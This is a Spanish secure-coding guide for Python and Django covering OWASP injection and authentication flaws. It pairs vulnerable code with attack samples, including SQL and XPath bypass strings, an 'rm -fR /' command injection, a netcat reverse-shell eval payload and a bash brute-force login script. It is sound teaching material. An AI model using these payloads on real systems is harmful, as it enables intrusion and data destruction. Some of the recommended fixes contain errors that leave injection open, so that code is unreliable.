# Desarrollo seguro

## 1. A1 - Inyecciones

[https://owasp.org/www-project-top-ten/2017/A1_2017-Injection](https://owasp.org/www-project-top-ten/2017/A1_2017-Injection)

### 1.1. SQL - Bypass de autenticación

#### 1.1.1 Código vulnerable:
```python
val=login.objects.raw("SELECT * FROM introduction_login WHERE user='"+name+"'AND password='"+password+"'")
if val:
    print("Welcome.")
else:
    print("Go to login.")
```

+ Ataque posible:
Con este ataque el atacante podría iniciar sesión con el usuario admin sin conocer la contraseña:
```
name=admin
password=' or 1=1 --
```

#### 1.1.2 Funciones **peligrosas**

**NO UTILIZAR ESTAS FUNCIONES DE ESTA FORMA.**
 + .extra()
```python
qs.extra(
  select={'val': "SELECT * FROM user WHERE user='%s' AND password='%s'"},
  select_params=(name,password,)
)
```
 + .raw()
```python
User.objects.raw("SELECT * FROM user WHERE user='"+name+"'AND password='"+password+"'"):
```
 + RawSQL
```python
from django.db.models.expressions import RawSQL
queryset.annotate(val=RawSQL("SELECT * FROM user WHERE user='%s' AND password='%s'", (name,password,)))
```
 + .execute()
```python
cursor = db.cursor()
cursor.execute("SELECT * FROM user WHERE user='"+name+"'AND password='"+password+"'")
```

#### 1.1.3. Mitigaciones **NO** recomendadas

Estás mitigaciones no se recomiendan por no proteger al 100% o ser fácil equivocarse al implementarlas.

- ~~Escapar las comillas~~.
 + ~~json.dumps()~~
 ```python
 # NO UTILIZAR
 name = json.dumps(name)
 password = json.dumps(password)
 User.objects.raw("SELECT * FROM user WHERE user='"+name+"' AND password='"+password+"'")
 ```
 + ~~repr()~~
 ```python
 # NO UTILIZAR
 name = repr(name)
 password = repr(password)
 User.objects.raw("SELECT * FROM user WHERE user='"+name+"' AND password='"+password+"'")
 ```
 + ~~.replace()~~
 ```python
 # NO UTILIZAR
 name = name.replace('"', '\\"').replace("'", "\\'")
 password = password.replace('"', '\\"').replace("'", "\\'")
 User.objects.raw("SELECT * FROM user WHERE user='"+name+"' AND password='"+password+"'")
 ```

#### 1.1.4. Mitigaciones recomendadas

Las mitigaciones se ordena de forma que la primera debe ser la prioritaria para mitigar la vulnerabilidad.

1. Utilizar "Prepared Statements" con consultas parametrizadas.
 + Modulo "authenticate" de Django para la opción de Prepared Statements:
 ```python
 from django.contrib.auth import authenticate
 myuser = request.POST['name']
 mypassword= request.POST['password']
 user = authenticate(username=myuser , password=mypassword)
 ```
 + raw()
 ```python
 Person.objects.raw("SELECT * FROM user WHERE user='%s'AND password='%s'", [name,password])
 ```
 + cursor.execute()
 ```python
 cursor.execute("SELECT * FROM user WHERE username = %(username)s AND password = %(password)s", {'name': name, 'password': password});
 ```
2. Whitelist de opciones posibles para el input.
 + Validación genérica de opciones.
 ```python
 wlUsername = { "admin", "guest", "paco", "luis" }
 if name in wlUsername:
   User.objects.raw("SELECT * FROM user WHERE user='"+name+"'"):
 ```

### 1.2. OS Command - Inyección de comando en el sistema

#### 1.2.1. Código vulnerable:
```python
IPaddress = request.POST.get('ip')
subprocess.check_output("ping "+IPaddress,shell=True,encoding="UTF-8");
```

+ Ataque posible:
Con este ataque se eliminarian todos los archivos y directorios del sistema operativo dejando inservible la aplicación (en caso de ejecutarse como root la aplicación):
```python
ip="1;rm --no-preserve-root -fR /"
```

#### 1.2.2. Funciones **peligrosas**

**NO UTILIZAR ESTAS FUNCIONES DE ESTA FORMA.**

+ subprocess.check_output()
```python
subprocess.check_output("ping "+IPaddress,shell=True);
```
+ subprocess.Popen()
```python
subprocess.Popen("ping "+IPaddress, shell=True)
```
+ subprocess.run()
```python
subprocess.run("ping "+IPaddress, shell=True)
```
+ subprocess.call()
```python
subprocess.call("ping "+IPaddress, shell=True)
```
+ os.popen()
```python
os.popen("ping "+IPaddress)
```
+ os.system()
```python
os.system("ping "+IPaddress)
```

#### 1.2.3. Mitigaciones recomendadas

Las mitigaciones se ordena de forma que la primera debe ser la prioritaria para mitigar la vulnerabilidad.

1. No utilizar funciones con ejecución de comandos. Algunos ejemplos de alternativas:
 + Renombrar directorios:
 Opción vulnerable:
 ```python
 # NO UTILIZAR
 os.popen("mv directorioOrigen DirectorioDestino")
 ```
 Opción alternativa segura:
 ```python
 os.rename("directorioOrigen", "DirectorioDestino")
 ```
 + Ping a host:
 Opción vulnerable:
 ```python
 # NO UTILIZAR
 os.popen("ping "+IPaddress)
 ```
 Opción alternativa segura:
 ```python
 pyping.ping(address)
 ```
2. Whitelist de los parámetros permitidos.
 + Array con las opciones posibles.
 ```python
 wlIPaddress = { "127.0.0.1", "208.67.222.222", "208.67.220.220" }
 if IPaddress in wlIPaddress:
   os.popen("ping "+IPaddress)
 ```
3. Parametrizar los inputs.
 + suprocess.run()
 ```python
 subprocess.run(["ping", address])
 ```
 + sh.Command()
 ```python
 ping_cmd = sh.Command("ping")
 ping_cmd(address)
 ```
4. Escapar los parámetros de entrada.
 + Función "shlex" para escapar y validar los datos introducidos:
 ```python
 address = shlex.quote(request.args.get(address))
 os.popen("ping "+IPaddress)
 ```

### 1.3. SSTI (Server-side template injection) - Inyección de comando en el sistema

#### 1.3.1. Código vulnerable
##### 1.3.1.1. Jinja:
```python
from jinja2 import Template
text = "Hello %s".format(name)
tm = Template(text)
msg = tm.render()
print(msg)
```

+ Ataque posible:
En este ataque se imprimirían las variables de entorno de la aplicación:
```python
name="{{ config.items() }}"
```

##### 1.3.1.2. Flask:
```python
from flask import Flask, render_template_string

print(return render_template_string(name))
```

+ Ataque posible:
En este ataque se imprimirían las variables de entorno de la aplicación:
```python
name="{{ config.items() }}"
```

#### 1.3.2. Mitigaciones recomendadas

Las mitigaciones se ordena de forma que la primera debe ser la prioritaria para mitigar la vulnerabilidad.

1. Utilizar la parametrización del renderizado:
 + Jinja
  ```python
  from jinja2 import Template
  tm = Template("Hello {{name}}")
  msg = tm.render(name=name)
  print(msg)
  ```
 + Flask
  ```python
  from flask import Flask render_template_string
  print(render_template_string("Hello {{name}}", name=request.args.get('c')))
  ```

### 1.4. XPath Injecton

#### 1.4.1. Código vulnerable:
```python
import xml.etree.ElementTree as ET

tree = ET.fromString("""
<?xml version="1.0" encoding="ISO-8859-1"?>
<data>
<user>
    <name>admin</name>
    <password>sup3rp2$$</password>
    <account>admin</account>
</user>
<user>
    <name>mark</name>
    <password>m12345</password>
    <account>regular</account>
</user>
<user>
    <name>fino</name>
    <password>fino2</password>
    <account>regular</account>
</user>
</data>
""")
query = "string(//user[name/text()='"+name+"' and password/text()='"+password+"']/account/text())"
print(root.findall(query))
```

+ Ataque posible:
Con este ataque el atacante puede acceder con una sesión de usuario administrador sin conocer el password.
```python
name=admin' or '1'='1
password=' or '1'='1
```

#### 1.4.2. Librerias **peligrosas**

**NO UTILIZAR ESTAS Librerias.** 

+ xml.etree.ElementTree
```python
import xml.etree.ElementTree as ET
```

#### 1.4.3. Mitigaciones recomendadas.

1. Utilizar la librería lxml con parametrización:
```python
from flask import request
from lxml import etree

parser = etree.XMLParser(resolve_entities=False)
tree = etree.parse('users.xml', parser)
root = tree.getroot()

@app.route('/user')
def user_location():
    username = request.args['username']
    query = "/collection/users/user[@name = $paramname]/location/text()"
    elmts = root.xpath(query, paramname = username)
    return 'Location %s' % list(elmts)
``` 

## 1.5. Header Injection

### 1.5.1. Código vulnerable.

#### 1.5.1.1 Flask
  ```python
  from flask import Response, request
  from werkzeug.datastructures import Headers
  
  @app.route('/route')
  def route():
      content_type = request.args["Content-Type"]
      response = Response()
      headers = Headers()
      headers.add("Content-Type", content_type) # Noncompliant
      response.headers = headers
      return response
  ```
  + Ataque posible:
  ```python
  Content-type: text/html; charset=utf-8\r\nLocation: maliciousweb.com\r\n\r\n…
  ```
#### 1.5.1.2. Django
  ```python
  import django.http
  
  def route(request):
      content_type = request.GET.get("Content-Type")
      response = django.http.HttpResponse()
      response.__setitem__('Content-Type', content_type) # Noncompliant
      return response
  ```
  + Ataque posible:
  ```
  Content-type: text/html; charset=utf-8\r\nLocation: maliciousweb.com\r\n\r\n…
  ```

#### 1.5.2. Mitigaciones recomendadas.

Las mitigaciones se ordena de forma que la primera debe ser la prioritaria para mitigar la vulnerabilidad.

1. Whitelist, una lista de valores permitidos:
  + Con Flask
  ```python
  from flask import Response, request
  from werkzeug.datastructures import Headers

  @app.route('/route')
  def route():
      listContentTypeAllowed = [ "application/json", "application/xml"  ]    
      content_type = request.args["Content-Type"]
  
      if content_type in listContentTypeAllowed: 
          headers.add("Content-Type", content_type) 
      else:
          headers.add("Content-Type", "application/json")
      response = Response()
      headers = Headers()

      response.headers = headers
      return response
  ```
  + Con Django
  ```python
  import django.http
  
  def route(request):
      listContentTypeAllowed = [ "application/json", "application/xml"  ]    
      content_type = request.GET.get("Content-Type")
      
      response = django.http.HttpResponse()
      if content_type in listContentTypeAllowed: 
          response.__setitem__('Content-Type', content_type)
      else:
          response.__setitem__('Content-Type', "application/json")
      return response 
  ```
2. Filtrado de los valores:
  + Con Flask
  ```python
  from flask import Response, request
  from werkzeug.datastructures import Headers
  import re
  
  @app.route('/route')
  def route():
      content_type = request.args["Content-Type"]
      allowed_content_types = r'application/(pdf|json|xml)'
      response = Response()
      headers = Headers()
      if re.match(allowed_content_types, content_type):
          headers.add("Content-Type", content_type)  # Compliant
      else:
          headers.add("Content-Type", "application/json")
      response.headers = headers
      return response
  ```
  + Con Django:
  ```python
  import django.http
  import re
  
  def route(request):
      content_type = request.GET.get("Content-Type")
      allowed_content_types = r'application/(pdf|json|xml)'
      response = django.http.HttpResponse()
      if re.match(allowed_content_types, content_type):
          response.__setitem__('Content-Type', content_type) # Compliant
      else:
          response.__setitem__('Content-Type', "application/json")
      return response 
   ```

### 1.6. Email Header Injection

#### 1.6.1. Código vulnerable
```python
import smtplib

fromAddress = "user@example.com"
toAddress = "user@gmail.com"
serverSMTP = 'smtp.example.com'
portSMTP = 587
message = "Hola, esto es un test."

body = f"""\
Subject: Hola
To: {fromAddress}
From: {toAddress}

{message}"""

s = smtplib.SMTP(serverSMTP, portSMTP)
s.sendmail(fromAddress, toAddress, body)
s.quit()
```

+ Ataque posible:
```
toAddress = "user@gmail.com\r\nBCC: atacante@malicioso.com"
```

#### 1.6.4. Mitigaciones recomendadas

Las mitigaciones se ordena de forma que la primera debe ser la prioritaria para mitigar la vulnerabilidad.

1. Parametrización de los valores de entrada:
 + Libreria smtplib:
 ```python
 import smtplib
 from email.mime.text import MIMEText
 
 msg = MIMEText("Hola, esto es un test.")
 msg['Subject'] = "Hola"
 msg['From'] = "user@example.com"
 msg['To'] = "user@gmail.com"
 serverSMTP = 'smtp.gmail.com'
 portSMTP = 587
 
 s = smtplib.SMTP(serverSMTP, portSMTP)
 s.sendmail(fromAddress, toAddress, msg.to_string())
 s.quit() 
 ```
 + Libreria Django:
 ```python
 from django.core.mail import send_mail

 send_mail(
     'Subject here',
     'Here is the message.',
     'from@example.com',
     ['to@example.com'],
     fail_silently=False,
 )
 ```
### 1.7. Inyeccion de código

La inyección de código se establece cuando se utilizan funciones utilizadas para interpretar el código que reciben, como la función "eval".

#### 1.1.1. Código vulnerable
+ Django
```python
# NO UTILIZAR
from django.shortcuts import render
from moth.views.base.show_template_view import ShowTemplateView

class ShowView(ShowTemplateView):
   
    def get(self, request, *args, **kwds):
        context = self.get_context_data()

        try:
            eval(request.GET['code'])
        except SyntaxError:
            pass

        context['html'] = 'Static placeholder.'
        return render(request, self.template_name, context)
```

+ Ataque posible:

Con el siguiente ataque sería posible crear una reverse shell donde el atacante tomaria el control de la máquina con el usuario que se ejecute el servicio web.
```
code="__import__('os').system('nc 1.1.1.1 port -e /bin/sh')"
```

#### 1.7.2. Funciones peligrosas

Estas son las funciones que pueden interpretar código python dentro del propio código python y que por lo tanto son peligrosas:

+ ~eval()~
```
# NO UTILIZAR
from django.shortcuts import render
from moth.views.base.show_template_view import ShowTemplateView

class ShowView(ShowTemplateView):
   
    def get(self, request, *args, **kwds):
        context = self.get_context_data()

        try:
            eval(request.GET['code'])
        except SyntaxError:
            pass

        context['html'] = 'Static placeholder.'
        return render(request, self.template_name, context)
```
+ ~exec()~
```
# NO UTILIZAR
from django.shortcuts import render
from moth.views.base.show_template_view import ShowTemplateView

class ShowView(ShowTemplateView):
   
    def get(self, request, *args, **kwds):
        context = self.get_context_data()

        try:
            exec(request.GET['code'])
        except SyntaxError:
            pass

        context['html'] = 'Static placeholder.'
        return render(request, self.template_name, context)
```
+ ~execfile()~
```
# NO UTILIZAR
from django.http import HttpResponseRedirect
from django.shortcuts import render
from .forms import UploadFileForm

def upload_file(request):
    if request.method == 'POST':
        execfile(request.FILES['file'].read())
        return HttpResponseRedirect('/success/url/')
    else:
        form = UploadFileForm()
    return render(request, 'upload.html', {'form': form})
```

#### 1.7.3. Mitigaciones recomendadas

Las mitigaciones se ordena de forma que la primera debe ser la prioritaria para mitigar la vulnerabilidad.

1. No utilizar funciones de interpretación de código (eval,exec,execfile), dejar la interpretación para la parte del servicio en backend.
2. En caso de tener que utilizarlas, realizar un whitelist de posibles opciones para pasarle a la función:
  ```python
from pprint import pprint
inputUser = input(":")
allowedOptions = { "print", "pprint" }
if inputUser in allowedOptions:
  eval(inputUser+"('hello user')")
else:
  print("Not allowed.")
  ```

## 2. A2 - Broken authentication

[https://owasp.org/www-project-top-ten/2017/A2_2017-Broken_Authentication](https://owasp.org/www-project-top-ten/2017/A2_2017-Broken_Authentication)

### 2.1. Brute force

Los tipos de brute force:
+ Brute force: Se prueban distintas contraseñas para un mismo usuario para intentar averiguar las credenciales.
+ Password Spraying: Se prueban distintos nombres de usuario para una misma contraseña o un grupo pequeño de contraseñas.
+ Credential Stuffing: Aprovechando bases de datos de cuentas robadas de otras cuentas, hacen peticiones al login de forma que envían la combinación de usuario/contraseña que se encuentran en esas bases de datos.
+ Brute force OTP: En el caso de tener instalado un sistema OTP con combinaciones de letras y/o números pequeñas (por ejemplo, 3 dígitos) es posible realizar brute force hasta encontrar la combinación correcta.

#### 2.1.1. Código vulnerable - Brute force de usuario y contraseña

+ Django
```
from django.contrib import auth

def do_login(request):
    request_method = request.method
    if request_method == 'POST':
        user_name = request.POST.get('username','')
        user_password = request.POST.get('password', '')
        user = auth.authenticate(request, username=user_name, password=user_password)
        # Si el usuario existe con el usuario y contraseña accede
        if user is not None:
            auth.login(request, user)
            response = HttpResponseRedirect('/user/login_success/')
            return response
        # Si el usuario y contraseña no coinciden muestra un error de login.
        else:
            error_json = {'error_message': 'User name or password is not correct.'}
            return render(request, 'user_register_login/user_login.html', error_json)
    else:
        return render(request, 'user_register_login/user_login.html')
```

+ Ataque posible
```
#!/bin/bash

# Usage: bash script.ch "username.file.txt" "password.file.txt"

FILEUSERS=$1
FILEPASS=$2

while IFS= read -r USER
do
  DOPASS=1
  curl -si 'https://example.com/login' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://example.com/login' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -b cookie.jar -c cookie.jar -H 'Upgrade-Insecure-Requests: 1' --data-urlencode "username=$USER" --data-urlencode "password=$USER"  2>&1 | grep -o "Error Login" >/dev/null
  if [ $? == 1 ];then
    echo "[+]$USER:$USER"
    DOPASS=0
  else
    echo "[-]$USER:$USER"
  fi
  if [ $DOPASS == 1 ];then
    while IFS= read -r PASS
    do
      curl -si 'https://example.com/login' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://example.com/login' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -b cookie.jar -c cookie.jar -H 'Upgrade-Insecure-Requests: 1' --data-urlencode "username=$USER" --data-urlencode "password=$PASS" 2>&1 | grep -o "Error Login" >/dev/null
      if [ $? == 1 ];then
        echo "[+]$USER:$PASS"
        break
      fi
    done < "$FILEPASS"
  fi
done < "$FILEUSERS"
```

#### 2.1.3. Mitigaciones **NO** recomendadas

+ Cookie: Contador de intentos fallidos de login en cookie. Fácilmente bypasseable si se destruye la cookie en cada intento de login.
```python
# NO UTILIZAR
from django.contrib import auth

def do_login(request):
    request_method = request.method
    
    # Recuperar el varlo del contador de intentos fallidos de login.
    attemptLoginCount = request.COOKIES.get('attempt_login')
    
    # En caso de que se superen los 10 intentos no dejará opción a realizar el login.
    if attemptLoginCount > 10:
        error_json = {'error_message': 'Too many access attempts.'}
        return render(request, 'user_register_login/user_login.html', error_json)
    
    if request_method == 'POST':
        user_name = request.POST.get('username','')
        user_password = request.POST.get('password', '')
        user = auth.authenticate(request, username=user_name, password=user_password)

        if user is not None:
            auth.login(request, user)
            response = HttpResponseRedirect('/user/login_success/')
            response.set_cookie('attempt_login', 0, 360)
            return response
        else:
            error_json = {'error_message': 'User name or password is not correct.'}
            attemptLoginCount = attemptLoginCount+1
            response = render(request, 'user_register_login/user_login.html', error_json)
            response.set_cookie('attempt_login', attemptLoginCount, 360)
            return response
    else:
        return render(request, 'user_register_login/user_login.html')
```

+ Contador de intentos de fallos por usuario. Solo funcionan para cubrir un solo usuario, si se hace un barrido de usuarios no se bloquea.
```python
# NO UTILIZAR
from django.contrib import auth
from django.contrib.auth.models import User
from datetime import datetime

def do_login(request):
    request_method = request.method
    if request_method == 'POST':
        user_name = request.POST.get('username','')
        user_password = request.POST.get('password', '')
        user = auth.authenticate(request, username=user_name, password=user_password)
        userObject = User(username=user_name)

        # Recupera la variable con el contador de intentos fallidos por el usuario.
        attemptLoginCount = userObject.attemptLoginCount
        # Recupera la variable con el timestamp del último bloqueo
        timestampBloqued = userObject.timestampBloqued
        # en el caso de que hayan pasado 5 minutos desde el último bloqueo el contador de intentos pasa a ser 0.
        if datetime.timestamp(now) - timestampBloqued > 300:
            attemptLoginCount = 0
        # En caso de que se supere a más de 10 los intentos fallido no deja realizar el login.
        if attemptLoginCount > 10:
            error_json = {'error_message': 'Too many access attempts.'}
            return render(request, 'user_register_login/user_login.html', error_json)

        if user is not None:
            auth.login(request, user)
            response = HttpResponseRedirect('/user/login_success/')
            return response
        else:
            error_json = {'error_message': 'User name or password is not correct.'}
            attemptLoginCount = attemptLoginCount+1
            userObject.attemptLoginCount = attemptLoginCount
            userObject.save()
                
            return render(request, 'user_register_login/user_login.html', error_json)
    else:
        return render(request, 'user_register_login/user_login.html')
```

#### 2.1.4. Mitigaciones recomendadas

Las mitigaciones se ordena de forma que la primera debe ser la prioritaria para mitigar la vulnerabilidad.

1. Captcha: Utilizar un captcha para el fallo de login por IP. [https://github.com/praekelt/django-recaptcha](https://github.com/praekelt/django-recaptcha)
2. Librerías de bloqueo de intentos: Utilizar una librería para el bloqueo de intentos de fuerza bruta por IP. 
 + [https://github.com/jazzband/django-defender](https://github.com/jazzband/django-defender)
 + [https://github.com/jazzband/django-axes](https://github.com/jazzband/django-axes)
 + [https://github.com/jsocol/django-ratelimit](https://github.com/jsocol/django-ratelimit)


### 2.2. Account enumeration

En la parte de login o de restablecimientoi si al introducir el usuario/emauil para identificar al usuario aparece un mensaje distinto cuando el usuario/email existen de cuando no existe es posible, mediante un ataque de fuerza bruta, sacar los usuarios/emails válidos para pode utilizaros en otras técnicas de brute forcing y reducir considerablemente el número de intentos necesarios para averiguar las credenciales. 

#### 2.2.1. Código vulnerable

+ Django
```
#NO UTILIZAR
from django.contrib import auth

def do_login(request):
    request_method = request.method
    if request_method == 'POST':
        user_name = request.POST.get('username','')
        user_password = request.POST.get('password', '')
        
        # Busca el usuario por el nombre facilitado
        userObject = User(username=user_name)
        if userObject is None:
            # En caso de que no exista muestra un mensaje indicando que no existe  
            error_json = {'error_message': 'User name not exists.'}
            return render(request, 'user_register_login/user_login.html', error_json)

        user = auth.authenticate(request, username=user_name, password=user_password)
        if user is not None:
            auth.login(request, user)
            response = HttpResponseRedirect('/user/login_success/')
            return response
        # Si el usuario y contraseña no coinciden muestra un error de login.
        else:
            error_json = {'error_message': 'User name or password is not correct.'}
            return render(request, 'user_register_login/user_login.html', error_json)
    else:
        return render(request, 'user_register_login/user_login.html')
```

+ Ataque posible: Un atacante puede, mediante peticiones de login de usuario con disintos usernames, averiguar que username son válidos dentro de la plataforma.
```bash
curl -X POST https://example.com/login -d "username=admin&password=1234" | grep "User name not exists." && echo "Exists" || echo "Not exists"
```

#### 2.2.2. Mitigaciones recomendadas

Las mitigaciones se ordena de forma que la primera debe ser la prioritaria para mitigar la vulnerabilidad.

1. No mostrar mensajes distintos en caso de que no exista el usuario/email.
```python
from django.contrib import auth

def do_login(request):
    request_method = request.method
    if request_method == 'POST':
        user_name = request.POST.get('username','')
        user_password = request.POST.get('password', '')
        user = auth.authenticate(request, username=user_name, password=user_password)
        # Si el usuario existe con el usuario y contraseña accede
        if user is not None:
            auth.login(request, user)
            response = HttpResponseRedirect('/user/login_success/')
            return response
        # Si el usuario y contraseña no coinciden muestra un error de login.
        else:
            error_json = {'error_message': 'User name or password is not correct.'}
            return render(request, 'user_register_login/user_login.html', error_json)
    else:
        return render(request, 'user_register_login/user_login.html')

```
2. Implementar un catcha para evitar intentos repetidos de la petición. [https://github.com/praekelt/django-recaptcha](https://github.com/praekelt/django-recaptcha)

### 2.3. Reset password

Cuando se implementa una funcionalidad de recuperación de contraseña mediante el correo electrónico.

#### 2.3.1. Código vulnerable

##### 2.3.1.1. Restablecer contraseña con usuario y introduccíón de email
```python
# NO UTILIZAR
from django.contrib.auth.models import User
from django.core.mail import send_mail

def do_reset(request):
    request_method = request.method
    if request_method == 'POST':
        username = request.POST.get('username','')
        email = request.POST.get('email', '')
        user = User(username=username)
        
        token = get_random_string(length=32)
        user.tokenResetPassword = token
        user.save()

        if user is not None:
            send_mail('Reset password request.', 'Please, enter on the URL and reset password https://example.com/reset_password?token=' + token, 'no-reply@example.com', [email], fail_silently=False,)
            response = HttpResponseRedirect('user/reset_success.html')
            return response
        else:
            error_json = {'error_message': 'We can't send email.'}
            return render(request, 'user/reset_fail.html', error_json)
    else:
        return render(request, 'user/reset_password.html')
```

+ Ataque posible: El atacante envía un usuario víctima y una dirección de correo que el atacante controle.
```
username=victima
email=atacante@email.com
```

##### 2.3.1.2. Restablecer contraseña con la misma contraseña para todos los usuarios y las peticiones.
```python
# NO UTILIZAR
from django.contrib.auth.models import User
from django.core.mail import send_mail

def do_reset(request):
    request_method = request.method
    password = "mismoPasswordParaTodos"
    if request_method == 'POST':
        username = request.POST.get('username','')
        user = User(username=username)
        email = user.email
        if user is not None:
            send_mail('Reset password request.', 'Your new password is ' + password, 'no-reply@example.com', [email], fail_silently=False,)
            user.password = make_password(password, None, 'md5')
            user.save()
            response = HttpResponseRedirect('user/reset_success.html')
            return response
        else:
            error_json = {'error_message': 'We can't send email.'}
            return render(request, 'user/reset_fail.html', error_json)
    else:
        return render(request, 'user/reset_password.html')
```

##### 2.3.1.3. Restablecer con contraseña fácilmente adivinable.
```python
# NO UTILIZAR
from django.contrib.auth.models import User
from django.core.mail import send_mail

def do_reset(request):
    request_method = request.method
    password = User.objects.make_random_password(length=4, allowed_chars='123456789')
    if request_method == 'POST':
        username = request.POST.get('username','')
        user = User(username=username)
        email = user.email
        if user is not None:
            send_mail('Reset password request.', 'Your new password is ' + password, 'no-reply@example.com', [email], fail_silently=False,)
            user.password = make_password(password, None, 'md5')
            user.save()
            response = HttpResponseRedirect('user/reset_success.html')
            return response
        else:
            error_json = {'error_message': 'We can't send email.'}
            return render(request, 'user/reset_fail.html', error_json)
    else:
        return render(request, 'user/reset_password.html')
```

+ Ataque posible: El atacante podría pedir un restablecimiento de contraseña de un email y posteriormente intentar averiguarlo con un ataque de fuerza bruta.

##### 2.2.1.4. Restablecer contraseña enviándola en texto claro al correo.
```python
# NO UTILIZAR
from django.contrib.auth.models import User
from django.core.mail import send_mail

def do_reset(request):
    request_method = request.method
    password = User.objects.make_random_password(length=12)
    if request_method == 'POST':
        username = request.POST.get('username','')
        user = User(username=username)
        email = user.email
        if user is not None:
            send_mail('Reset password request.', 'Your new password is ' + password, 'no-reply@example.com', [email], fail_silently=False,)
            user.password = make_password(password, None, 'md5')
            user.save()
            response = HttpResponseRedirect('user/reset_success.html')
            return response
        else:
            error_json = {'error_message': 'We can't send email.'}
            return render(request, 'user/reset_fail.html', error_json)
    else:
        return render(request, 'user/reset_password.html')
```

+ Ataques posible:El atacante podría utilizar un ataque de MITM ( si el usuario utiliza un servicio de correo donde se envían los datos en texto claro) para forzar el restablecimiento y conseguir la contraseña en texto claro.

##### 2.2.1.5. Restablecer contraseña sin caducidad en el token.
En el caso de que se realice la implementación correcta del token y su flujo de cambio de contraseña hay que tener en cuenta que el restablecimiento de contraseña debe hacerse en un tiempo máximo de 24 horas, por lo tanto el token debe tener caducidad.
```python
# NO UTILIZAR
from django.contrib.auth.models import User
from django.core.mail import send_mail

def do_reset(request):
    request_method = request.method
    if request_method == 'POST':
        username = request.POST.get('username','')
        user = User(username=username)
        email = user.email
        token = get_random_string(length=32)
        user.tokenResetPassword = token
        user.save()

        if user is not None:
            send_mail('Reset password request.', 'Please, enter on the URL and reset password https://example.com/reset_password?token=' + token, 'no-reply@example.com', [email], fail_silently=False,)
            response = HttpResponseRedirect('user/reset_success.html')
            return response
        else:
            error_json = {'error_message': 'We can't send email.'}
            return render(request, 'user/reset_fail.html', error_json)
    else:
        return render(request, 'user/reset_password.html')
```

+ Ataque posible: Un atacante, mediante la lectura del correo ya sea por un ataque de MITM o de lectura del propio servicio de correo, podría reaprobechar el token y realziar un restablecimiento de la contraseña.

##### 2.3.1.6. Restablecer contraseña con pregunta.

En ocasiones encontramos métodos de restablecer la contraseña con una pregunta personal que, de forma teórica, solamente sabe el mismo usuario. Sin embargo, muchas veces son preguntas personales que realizando una pequeña búsqueda en datos públicos de la persona se podrían averiguar.

```python
# NO UTILIZAR
from django.contrib.auth.models import User

def do_reset(request):
    request_method = request.method
    if request_method == 'POST':
        username = request.POST.get('username','')
        user = User(username=username)
        answerQuestion = request.POST.get('question','')
        
        if user is not None:
            if user.answerQuestion = answerQuestion:
                return HttpResponseRedirect('user/reset_password2.html'
        error_json = {'error_message': 'The user or question are wrong.'}
        return render(request, 'user/reset_fail.html', error_json)
    else:
        return render(request, 'user/reset_password.html')
```

+ Ataque posible: Un atacante podría aprovechar la información que publican sus usuarios o la cercanía con su víctima para conseguir averiguar la respuesta a la pregunta.

#### 2.3.2. Mitigaciones recomendadas

Para la mitigación de las vulnerabilidades relacionadas con el restablecimiento de contraseña el mejor método es utilizar las librerías de Django para ello. A continuación se muestran 2 recursos para implementar correctamente el sistema de restablecimiento de contraseña vía email:
+ [https://docs.djangoproject.com/en/3.2/topics/auth/default/](https://docs.djangoproject.com/en/3.2/topics/auth/default/) 
+ [https://learndjango.com/tutorials/django-password-reset-tutorial](https://learndjango.com/tutorials/django-password-reset-tutorial) 

### 2.4. Weak password allowed

En el registro de usuarios y en el restablecimiento de contraseña es necesario implementar políticas de complejidad de la contraseña para no permitir contraseñas débiles que puedan ser fácilmente deducibles que, junto un ataque de Account Enumeration o de Brute Force, pueda ser utilizada para robar la cuenta al usuario.

#### 2.4.1. Código vulnerable

No existe un código vulnerable como tal, simplemente al guardar o cambiar de contraseña es necesario tener en cuenta que debe tener por lo menos unos requisitos mínimos.

#### 2.4.2. Mitigaciones recomendadas

Las mitigaciones se ordena de forma que la primera debe ser la prioritaria para mitigar la vulnerabilidad. Con una de las mitigaciones es suficiente para mitigar la vulnerabilidad.

1. Modulo auth de Django: En el caso de trabajar con Django con el módulo de Password Validation sería suficiente siempre que cumpla los puntos deseados para la validación de una contraseña robusta. [https://docs.djangoproject.com/en/3.2/topics/auth/passwords/#module-django.contrib.auth.password_validation](https://docs.djangoproject.com/en/3.2/topics/auth/passwords/#module-django.contrib.auth.password_validation)
2. Password Validator (Actualmente para versión 3.7 de python): Para desarrollos que no tengan que ver con Django es posible utilizar la librería: [https://pypi.org/project/password-validator/](https://pypi.org/project/password-validator/)

**IMPORTANTE**
Las políticas que debe cumplir una contraseña al ser asignada a un usuario son las siguientes:
+ Mínima longitud de 12.
+ Al menos 1 carácter numérico.
+ Al menos 1 carácter alfabético en minúscula.
+ Al menos 1 carácter alfabético en mayúscula.
+ Al menos un carácter especial.
+ No debería ser el mismo que la cuenta con la que se accede, por ejemplo, el email o el username.

### 2.5. Plain text password

Cualquier secreto que se utilice para validar un usuario debería ir cifrado/hasheado, ya que de ser existir una forma de que el atacante lea la base de datos, podría reutilizar las contraseñas para acceder con el usuario en el mismo servicio o en otros donde el usuario reutilice las contraseñas.

#### 2.5.1. Código vulnerable

+ Django, no existe un código vulnerable por defecto, es necesario implementar un hasher para no hashear las contraseñas correctamente, aquí mostramos un ejemplo.
Esta línea iría en la configuración.
```
PASSWORD_HASHERS = ('NoEncrypt.PlainTextPassword',)  
```
Fichero noencrypt.py con el código.
```python
# NO UTILIZAR
from django.contrib.auth.hashers import BasePasswordHasher

class PlainTextPassword(BasePasswordHasher):
    algorithm = "plain"

    def salt(self):
        return ''

    def encode(self, password, salt):
        assert salt == ''
        return password

    def verify(self, password, encoded):
        return password == encoded

    def safe_summary(self, encoded):
        return OrderedDict([
            (_('algorithm'), self.algorithm),
            (_('hash'), encoded),
        ])
```

+ Ataque posible: en el caso de un atacante consiga acceder a los datos de la base de datos podrá conseguir las credenciales de todos los usuarios.

#### 2.5.4. Mitigaciones recomendadas

Las mitigaciones se ordena de forma que la primera debe ser la prioritaria para mitigar la vulnerabilidad.

